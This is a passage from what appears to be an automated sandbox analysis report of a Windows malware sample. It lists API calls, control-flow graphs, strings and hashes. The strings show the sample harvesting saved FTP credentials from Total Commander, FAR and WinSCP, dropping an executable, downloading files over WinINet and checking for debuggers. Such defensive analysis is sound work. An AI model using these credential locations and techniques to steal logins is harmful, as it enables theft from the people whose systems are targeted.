                          • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 268 407cd7-407cfe call 40d5b0 GetModuleFileNameW 271 407d00-407d0b call 406cf9 268->271 272 407d0d-407d15 GetCurrentDirectoryW 268->272 274 407d1b-407d31 call 4054ed 271->274 272->274 278 407d33-407d35 274->278 279 407d36-407d60 CreateFileW 274->279 278->279
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                          • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 280 407727-407751 call 40d5b0 GetModuleFileNameW 283 407753-40776b call 4075d4 280->283 284 40776d-40776e 280->284 289 4077e1-4077ea 283->289 286 407774-4077a0 ExpandEnvironmentStringsW call 4075d4 284->286 291 4077a2-4077a5 286->291 292 4077eb-4077ee 286->292 294 4077b7-4077ba 291->294 295 4077a7-4077b5 GetLastError 291->295 293 4077e0 292->293 293->289 296 4077d2-4077dc 294->296 297 4077bc-4077c8 GetLastError 294->297 298 4077ca call 40a786 295->298 296->286 300 4077de 296->300 297->298 301 4077cf 298->301 300->293 301->296
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 302 4077f0-407829 call 40d530 CreateProcessW
                          APIs
                          • _memset.LIBCMT ref: 00407800
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateProcess_memset
                          • String ID:
                          • API String ID: 1177741608-0
                          • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                          • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 312 4069c0-4069fc RegQueryValueExW RegCloseKey
                          APIs
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 313 406d14-406d20 InternetAttemptConnect 314 406d22-406d25 313->314 315 406d26-406d41 InternetOpenW 313->315
                          APIs
                          • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$AttemptConnectOpen
                          • String ID:
                          • API String ID: 2984283330-0
                          • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                          • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                          • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                          • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                          • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                          • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfileString$AllocHeap
                          • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                          • API String ID: 2479592106-2015850556
                          • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                          • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58
                          APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 004027F5
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$InitializeOpenOption
                          • String ID: From: true
                          • API String ID: 1176259655-9585188
                          • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                          • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 11d3048b97e390bc55daf18a5165622c721ea4f879a8cde4a2ec179576955272
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Opcode Fuzzy Hash: 11d3048b97e390bc55daf18a5165622c721ea4f879a8cde4a2ec179576955272
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                          • RegCloseKey.ADVAPI32(?), ref: 0040442A
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapOpen$AllocCloseEnumFree
                          • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                          • API String ID: 416369273-4007225339
                          • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                          • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          • API String ID: 1987340527-3375436608
                          • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                          • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          • API String ID: 3472027048-2333287219
                          • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                          • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
